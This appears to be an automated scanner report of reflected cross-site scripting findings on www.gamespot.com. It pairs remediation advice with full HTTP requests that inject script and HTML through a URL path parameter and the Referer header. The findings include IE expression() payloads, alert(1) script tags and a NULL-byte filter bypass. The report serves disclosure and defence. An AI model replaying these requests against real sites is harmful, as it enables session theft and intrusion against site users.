Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e4c4"style%3d"x%3aexpression(alert(1))"c45066ffb52 was submitted in the REST URL parameter 3. This input was echoed as 3e4c4"style="x:expression(alert(1))"c45066ffb52 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /features/6257476/index.html3e4c4"style%3d"x%3aexpression(alert(1))"c45066ffb52 HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b22f"style%3d"x%3aexpression(alert(1))"a3a45c38e78 was submitted in the REST URL parameter 3. This input was echoed as 5b22f"style="x:expression(alert(1))"a3a45c38e78 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /features/6285489/index.html5b22f"style%3d"x%3aexpression(alert(1))"a3a45c38e78 HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58ab7"><a>c0ba6674656 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /cheats.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: 58ab7"><a>c0ba6674656
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f268"><a>1c49d090686 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /downloads/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: 7f268"><a>1c49d090686
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0029354"><a>a594e1a53b was submitted in the Referer HTTP header. This input was echoed as 29354"><a>a594e1a53b in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /ds/action/supermariobrosds/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: %0029354"><a>a594e1a53b
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 740c7"><script>alert(1)</script>01f217f7498 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /forums/fav_boards.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: http://www.google.com/search?hl=en&q=740c7"><script>alert(1)</script>01f217f7498
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e68ef"><a>bb987515225 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /forums/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: e68ef"><a>bb987515225
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87533"><a>39ab77fc0f6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /games.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: 87533"><a>39ab77fc0f6
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19bbe"><a>88cb840096b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /misc/rss/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: 19bbe"><a>88cb840096b
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e10cc"><a>3a8a07aa61c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /news/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: e10cc"><a>3a8a07aa61c
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1ad4"><a>72453dfbfd2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /newthisweek.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: b1ad4"><a>72453dfbfd2
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24428"><script>alert(1)</script>2015ef16d23 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /pages/common/login.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: http://www.google.com/search?hl=en&q=24428"><script>alert(1)</script>2015ef16d23
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a5d45"><a>6e0729df1b was submitted in the Referer HTTP header. This input was echoed as a5d45"><a>6e0729df1b in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /pages/facebook/connect/login.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: %00a5d45"><a>6e0729df1b
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bfa8"><a>d4521acd77e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /pages/facebook/connect/login.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: 1bfa8"><a>d4521acd77e
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ab2f"><script>alert(1)</script>0b3a8c1eee4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /pages/forums/post_msg.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: http://www.google.com/search?hl=en&q=4ab2f"><script>alert(1)</script>0b3a8c1eee4
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b36c4"><a>5e3d367f073 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /pc/rpg/worldofwarcraft/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: b36c4"><a>5e3d367f073
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 825e3"><a>0a920337b90 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /pc/strategy/ageofempiresiii/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: 825e3"><a>0a920337b90
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61e9b"><a>8e563cc27a4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /ps2/action/grandtheftautovicecity/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: 61e9b"><a>8e563cc27a4
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44e80"><a>fcb868d2c5f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /ps2/action/gta4/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: 44e80"><a>fcb868d2c5f
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3469b"><a>4d3616c454b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
